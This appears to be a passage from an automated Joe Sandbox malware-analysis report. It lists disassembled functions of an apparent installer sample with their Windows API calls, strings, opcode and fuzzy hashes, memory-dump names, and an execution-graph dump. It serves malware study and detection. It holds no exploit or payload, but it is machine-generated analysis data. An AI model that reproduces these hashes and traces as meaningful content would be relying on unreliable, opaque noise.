                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: lstrcpyn$CreateFilelstrcmp
                          • String ID: Version
                          • API String ID: 512980652-315105994
                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                          Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                          • GetTickCount.KERNEL32 ref: 00403303
                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                          • String ID:
                          • API String ID: 2102729457-0
                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                          Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                          • String ID:
                          • API String ID: 2883127279-0
                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                          Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Window$EnableShowlstrlenwvsprintf
                          • String ID: HideWindow
                          • API String ID: 1249568736-780306582
                          • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                          • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                          Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: PrivateProfileStringlstrcmp
                          • String ID: !N~
                          • API String ID: 623250636-529124213
                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                          Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                          • CloseHandle.KERNEL32(?), ref: 00405C71
                          Strings
                          • Error launching installer, xrefs: 00405C48
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: Error launching installer
                          • API String ID: 3712363035-66219284
                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                          Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: CloseHandlelstrlenwvsprintf
                          • String ID: RMDir: RemoveDirectory invalid input("")
                          • API String ID: 3509786178-2769509956
                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                          Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                          Execution Graph

                          Execution Coverage:4.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:2.6%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:200
                          execution_graph 100505 537db3 100506 537dbf __setmbcp 100505->100506 100542 539f68 GetStartupInfoW 100506->100542 100508 537dc4 100544 538cdc GetProcessHeap 100508->100544 100510 537e1c 100511 537e27 100510->100511 100630 537f03 58 API calls 3 library calls 100510->100630 100545 539c46 100511->100545 100514 537e2d 100515 537e38 __RTC_Initialize 100514->100515 100631 537f03 58 API calls 3 library calls 100514->100631 100566 53d732 100515->100566 100518 537e47 100519 537e53 GetCommandLineW 100518->100519 100632 537f03 58 API calls 3 library calls 100518->100632 100585 545083 GetEnvironmentStringsW 100519->100585 100522 537e52 100522->100519 100525 537e6d 100526 537e78 100525->100526 100633 533217 58 API calls 3 library calls 100525->100633 100595 544eb8 100526->100595 100529 537e7e 100530 537e89 100529->100530 100634 533217 58 API calls 3 library calls 100529->100634 100609 533251 100530->100609 100533 537e91 100535 537e9c __wwincmdln 100533->100535 100635 533217 58 API calls 3 library calls 100533->100635 100615 525f8b 100535->100615 100537 537eb0 100538 537ebf 100537->100538 100627 5334ba 100537->100627 100636 533242 58 API calls _doexit 100538->100636 100541 537ec4 __setmbcp 100543 539f7e 100542->100543 100543->100508 100544->100510 100637 5332e9 36 API calls 2 library calls 100545->100637 100547 539c4b 100638 539e9c InitializeCriticalSectionAndSpinCount ___lock_fhandle 100547->100638 100549 539c50 100550 539c54 100549->100550 100640 539eea TlsAlloc 100549->100640 100639 539cbc 61 API calls 2 library calls 100550->100639 100553 539c59 100553->100514 100554 539c66 100554->100550 100555 539c71 100554->100555 100641 538935 100555->100641 100558 539cb3 100649 539cbc 61 API calls 2 library calls 100558->100649 100561 539c92 100561->100558 100563 539c98 100561->100563 100562 539cb8 100562->100514 100648 539b93 58 API calls 4 library calls 100563->100648 100565 539ca0 GetCurrentThreadId 100565->100514 100567 53d73e __setmbcp 100566->100567 100661 539d6b 100567->100661 100569 53d745 100570 538935 __calloc_crt 58 API calls 100569->100570 100572 53d756 100570->100572 100571 53d7c1 GetStartupInfoW 100579 53d7d6 100571->100579 100582 53d905 100571->100582 100572->100571 100573 53d761 @_EH4_CallFilterFunc@8 __setmbcp 100572->100573 100573->100518 100574 53d9cd 100670 53d9dd LeaveCriticalSection _doexit 100574->100670 100576 538935 __calloc_crt 58 API calls 100576->100579 100577 53d952 GetStdHandle 100577->100582 100578 53d965 GetFileType 100578->100582 100579->100576 100580 53d824 100579->100580 100579->100582 100581 53d858 GetFileType 100580->100581 100580->100582 100668 539f8b InitializeCriticalSectionAndSpinCount 100580->100668 100581->100580 100582->100574 100582->100577 100582->100578 100669 539f8b InitializeCriticalSectionAndSpinCount 100582->100669 100586 545094 100585->100586 100587 537e63 100585->100587 100716 53897d 58 API calls 2 library calls 100586->100716 100591 544c7b GetModuleFileNameW 100587->100591 100589 5450ba _memmove 100590 5450d0 FreeEnvironmentStringsW 100589->100590 100590->100587 100593 544caf _wparse_cmdline 100591->100593 100592 544cef _wparse_cmdline 100592->100525 100593->100592 100717 53897d 58 API calls 2 library calls 100593->100717 100596 544ed1 __NMSG_WRITE 100595->100596 100597 544ec9 100595->100597 100598 538935 __calloc_crt 58 API calls 100596->100598 100597->100529 100602 544efa __NMSG_WRITE 100598->100602 100599 532eb5 _free 58 API calls 100599->100597 100600 538935 __calloc_crt 58 API calls 100600->100602 100601 544f51 100601->100599 100602->100597 100602->100600 100602->100601 100603 544f76 100602->100603 100606 544f8d 100602->100606 100718 544767 58 API calls 2 library calls 100602->100718 100604 532eb5 _free 58 API calls 100603->100604 100604->100597 100719 538f26 IsProcessorFeaturePresent 100606->100719 100608 544f99 100608->100529 100610 53325d __IsNonwritableInCurrentImage 100609->100610 100742 53a631 100610->100742 100612 53327b __initterm_e 100614 53329a __cinit __IsNonwritableInCurrentImage 100612->100614 100745 532ea0 100612->100745 100614->100533 100616 525fa5 100615->100616 100626 526044 100615->100626 100617 525fdf IsThemeActive 100616->100617 100780 5334ce 100617->100780 100621 52600b 100792 525f00 SystemParametersInfoW SystemParametersInfoW 100621->100792 100623 526017 100793 525240 100623->100793 100625 52601f SystemParametersInfoW 100625->100626 100626->100537 103092 53338b 100627->103092 100629 5334c9 100629->100538 100630->100511 100631->100515 100632->100522 100636->100541 100637->100547 100638->100549 100639->100553 100640->100554 100643 53893c 100641->100643 100644 538977 100643->100644 100646 53895a 100643->100646 100650 545356 100643->100650 100644->100558 100647 539f46 TlsSetValue 100644->100647 100646->100643 100646->100644 100658 53a292 Sleep 100646->100658 100647->100561 100648->100565 100649->100562 100651 545361 100650->100651 100654 54537c 100650->100654 100652 54536d 100651->100652 100651->100654 100659 538c88 58 API calls __getptd_noexit 100652->100659 100655 54538c HeapAlloc 100654->100655 100656 545372 100654->100656 100660 533503 DecodePointer 100654->100660 100655->100654 100655->100656 100656->100643 100658->100646 100659->100656 100660->100654 100662 539d8f EnterCriticalSection 100661->100662 100663 539d7c 100661->100663 100662->100569 100671 539df3 100663->100671 100665 539d82 100665->100662 100695 533217 58 API calls 3 library calls 100665->100695 100668->100580 100669->100582 100670->100573 100672 539dff __setmbcp 100671->100672 100673 539e20 100672->100673 100674 539e08 100672->100674 100682 539e41 __setmbcp 100673->100682 100701 53897d 58 API calls 2 library calls 100673->100701 100696 53a2cb 58 API calls __NMSG_WRITE 100674->100696 100676 539e0d 100697 53a328 58 API calls 5 library calls 100676->100697 100678 539e35 100680 539e4b 100678->100680 100681 539e3c 100678->100681 100685 539d6b __lock 58 API calls 100680->100685 100702 538c88 58 API calls __getptd_noexit 100681->100702 100682->100665 100683 539e14 100698 533201 100683->100698 100687 539e52 100685->100687 100689 539e77 100687->100689 100690 539e5f 100687->100690 100704 532eb5 100689->100704 100703 539f8b InitializeCriticalSectionAndSpinCount 100690->100703 100693 539e6b 100710 539e93 LeaveCriticalSection _doexit 100693->100710 100696->100676 100697->100683 100711 5331cd GetModuleHandleExW 100698->100711 100701->100678 100702->100682 100703->100693 100705 532ebe RtlFreeHeap 100704->100705 100709 532ee7 __dosmaperr 100704->100709 100706 532ed3 100705->100706 100705->100709 100715 538c88 58 API calls __getptd_noexit 100706->100715 100708 532ed9 GetLastError 100708->100709 100709->100693 100710->100682 100712 5331e6 GetProcAddress 100711->100712 100713 5331fd ExitProcess 100711->100713 100712->100713 100714 5331f8 100712->100714 100714->100713 100715->100708 100716->100589 100717->100592 100718->100602 100720 538f31 100719->100720 100725 538db9 100720->100725 100724 538f4c 100724->100608 100726 538dd3 _memset __call_reportfault 100725->100726 100727 538df3 IsDebuggerPresent 100726->100727 100733 53a2b5 SetUnhandledExceptionFilter UnhandledExceptionFilter 100727->100733 100729 538eb7 __call_reportfault 100734 53c756 100729->100734 100731 538eda 100732 53a2a0 GetCurrentProcess TerminateProcess 100731->100732 100732->100724 100733->100729 100735 53c760 IsProcessorFeaturePresent 100734->100735 100736 53c75e 100734->100736 100738 545a6a 100735->100738 100736->100731 100741 545a19 5 API calls 2 library calls 100738->100741 100740 545b4d 100740->100731 100741->100740 100743 53a634 EncodePointer 100742->100743 100743->100743 100744 53a64e 100743->100744 100744->100612 100748 532da4 100745->100748 100747 532eab 100747->100614 100749 532db0 __setmbcp 100748->100749 100756 533379 100749->100756 100755 532dd7 __setmbcp 100755->100747 100757 539d6b __lock 58 API calls 100756->100757 100758 532db9 100757->100758 100759 532de8 DecodePointer DecodePointer 100758->100759 100760 532dc5 100759->100760 100761 532e15 100759->100761 100770 532de2 100760->100770 100761->100760 100773 538904 59 API calls 2 library calls 100761->100773 100763 532e78 EncodePointer EncodePointer 100763->100760 100764 532e4c 100764->100760 100769 532e66 EncodePointer 100764->100769 100775 5389c4 61 API calls __realloc_crt 100764->100775 100765 532e27 100765->100763 100765->100764 100774 5389c4 61 API calls __realloc_crt 100765->100774 100768 532e60 100768->100760 100768->100769 100769->100763 100776 533382 100770->100776 100773->100765 100774->100764 100775->100768 100779 539ed5 LeaveCriticalSection 100776->100779 100778 532de7 100778->100755 100779->100778 100781 539d6b __lock 58 API calls 100780->100781 100782 5334d9 DecodePointer EncodePointer 100781->100782 100845 539ed5 LeaveCriticalSection 100782->100845 100784 526004 100785 533536 100784->100785 100786 533540 100785->100786 100787 53355a 100785->100787 100786->100787 100846 538c88 58 API calls __getptd_noexit 100786->100846 100787->100621 100789 53354a 100847 538f16 9 API calls __cftoe2_l 100789->100847 100791 533555 100791->100621 100792->100623 100794 52524d __ftell_nolock 100793->100794 100848 521207 100794->100848 100798 52527e IsDebuggerPresent 100799 560aa1 MessageBoxA 100798->100799 100800 52528c 100798->100800 100802 560ab9 100799->100802 100801 5252a0 100800->100801 100800->100802 100921 5231bf 100801->100921 101065 52314d 59 API calls Mailbox 100802->101065 100806 560ac9 100812 560adf SetCurrentDirectoryW 100806->100812 100807 5252be GetFullPathNameW 100937 521821 100807->100937 100809 52535f SetCurrentDirectoryW 100811 52536c Mailbox 100809->100811 100810 5252f9 100946 51bbc6 100810->100946 100811->100625 100812->100811 100815 525314 100816 52531e 100815->100816 101066 574d89 AllocateAndInitializeSid CheckTokenMembership FreeSid 100815->101066 100962 52514c GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 100816->100962 100819 560afc 100819->100816 100822 560b0d 100819->100822 101067 52fffa 100822->101067 100823 525328 100825 52533d 100823->100825 100970 5259d3 100823->100970 100981 51bc70 100825->100981 100826 560b15 101074 521a36 100826->101074 100829 525348 100831 525358 100829->100831 101061 525ac3 100829->101061 100831->100809 100845->100784 100846->100789 100847->100791 101094 530f16 100848->101094 100850 521228 100851 530f16 Mailbox 59 API calls 100850->100851 100852 521236 GetCurrentDirectoryW 100851->100852 100853 524ec8 100852->100853 100854 521207 59 API calls 100853->100854 100855 524ede 100854->100855 101131 525420 100855->101131 100857 524efc 101145 5219e1 100857->101145 100859 524f10 101149 521c9c 100859->101149 100864 521a36 59 API calls 100865 524f34 100864->100865 101156 5139be 100865->101156 100867 524f44 Mailbox 100868 521a36 59 API calls 100867->100868 100869 524f68 100868->100869 100870 5139be 68 API calls 100869->100870 100871 524f77 Mailbox 100870->100871 100872 521207 59 API calls 100871->100872 100873 524f94 100872->100873 101160 5255bc 100873->101160 100877 524fae 100878 5609d4 100877->100878 100879 524fb8 100877->100879 100880 5255bc 59 API calls 100878->100880 100881 53305f _W_store_winword 60 API calls 100879->100881 100882 5609e8 100880->100882 100883 524fc3 100881->100883 100885 5255bc 59 API calls 100882->100885 100883->100882 100884 524fcd 100883->100884 100886 53305f _W_store_winword 60 API calls 100884->100886 100887 560a04 100885->100887 100888 524fd8 100886->100888 100890 52fffa 61 API calls 100887->100890 100888->100887 100889 524fe2 100888->100889 100891 53305f _W_store_winword 60 API calls 100889->100891 100892 560a27 100890->100892 100893 524fed 100891->100893 100896 5255bc 59 API calls 100892->100896 100894 524ff7 100893->100894 100895 560a50 100893->100895 100898 52501b 100894->100898 100901 521c9c 59 API calls 100894->100901 100899 5255bc 59 API calls 100895->100899 100897 560a33 100896->100897 100900 521c9c 59 API calls 100897->100900 101176 5147be 100898->101176 100902 560a6e 100899->100902 100903 560a41 100900->100903 100904 52500e 100901->100904 100906 521c9c 59 API calls 100902->100906 100907 5255bc 59 API calls 100903->100907 100908 5255bc 59 API calls 100904->100908 100910 560a7c 100906->100910 100907->100895 100908->100898 100912 5255bc 59 API calls 100910->100912 100914 560a8b 100912->100914 100914->100914 100916 51477a 59 API calls 100918 525055 100916->100918 100917 5143d0 59 API calls 100917->100918 100918->100916 100918->100917 100919 5255bc 59 API calls 100918->100919 100920 52509b Mailbox 100918->100920 100919->100918 100920->100798 100922 5231cc __ftell_nolock 100921->100922 100923 5231e5 100922->100923 100924 560294 _memset 100922->100924 101260 5301af 100923->101260 100926 5602b0 GetOpenFileNameW 100924->100926 100928 5602ff 100926->100928 100930 521821 59 API calls 100928->100930 100932 560314 100930->100932 100932->100932 100934 523203 101288 52278a 100934->101288 100938 52189a 100937->100938 100939 52182d __NMSG_WRITE 100937->100939 100940 521981 59 API calls 100938->100940 100941 521843 100939->100941 100942 521868 100939->100942 100945 52184b _memmove 100940->100945 102154 521b7c 59 API calls Mailbox 100941->102154 100943 521c7e 59 API calls 100942->100943 100943->100945 100945->100810 100947 51bbd3 __ftell_nolock 100946->100947 102155 522cb2 100947->102155 100949 51bbd8 100961 51bc52 100949->100961 102166 51c770 89 API calls 100949->102166 100951 51bbe5 100951->100961 102167 51f5a7 91 API calls Mailbox 100951->102167 100953 51bbee 100954 51bbf2 GetFullPathNameW 100953->100954 100953->100961 100955 521821 59 API calls 100954->100955 100956 51bc1e 100955->100956 100957 521821 59 API calls 100956->100957 100958 51bc2b 100957->100958 100959 5534b7 _wcscat 100958->100959 100960 521821 59 API calls 100958->100960 100960->100961 100961->100806 100961->100815 100963 5251b6 LoadImageW RegisterClassExW 100962->100963 100964 560a90 100962->100964 102170 513411 7 API calls 100963->102170 102171 525f5b LoadImageW EnumResourceNamesW 100964->102171 100967 560a99 100968 52523a 100969 5250db CreateWindowExW CreateWindowExW ShowWindow ShowWindow 100968->100969 100969->100823 100971 5259fe _memset 100970->100971 102172 525800 100971->102172 100974 525a83 100976 525ab9 Shell_NotifyIconW 100974->100976 100977 525a9d Shell_NotifyIconW 100974->100977 100978 525aab 100976->100978 100977->100978 100982 5534cf 100981->100982 100993 51bc95 100981->100993 102403 57a2fa 89 API calls 4 library calls 100982->102403 100984 51bf3b 100984->100829 100989 51bf25 Mailbox 100989->100984 102372 51c460 100989->102372 101018 51bca5 Mailbox 100993->101018 102404 515376 60 API calls 100993->102404 102405 566def 290 API calls 100993->102405 100996 5535e3 Sleep 100996->101018 100997 515376 60 API calls 100997->101018 100998 51bf54 timeGetTime 100998->101018 101000 553f8d WaitForSingleObject 101001 553fad GetExitCodeProcess CloseHandle 101000->101001 101000->101018 101024 51c36b 101001->101024 101002 521c9c 59 API calls 101002->101018 101003 521207 59 API calls 101032 5537ce Mailbox 101003->101032 101004 51c210 Sleep 101004->101018 101005 530f16 59 API calls Mailbox 101005->101018 101007 5542d9 Sleep 101007->101032 101009 516cd8 268 API calls 101009->101018 101011 51c324 timeGetTime 102402 515376 60 API calls 101011->102402 101016 554370 GetExitCodeProcess 101022 554386 WaitForSingleObject 101016->101022 101023 55439c CloseHandle 101016->101023 101018->100989 101018->100996 101018->100997 101018->100998 101018->101000 101018->101002 101018->101004 101018->101005 101018->101007 101018->101009 101018->101011 101020 516d79 109 API calls 101018->101020 101018->101024 101018->101032 101035 5153b0 268 API calls 101018->101035 101037 51c26d 101018->101037 101042 57a2fa 89 API calls 101018->101042 101045 513ea3 68 API calls 101018->101045 101046 566ad4 59 API calls Mailbox 101018->101046 101047 5139be 68 API calls 101018->101047 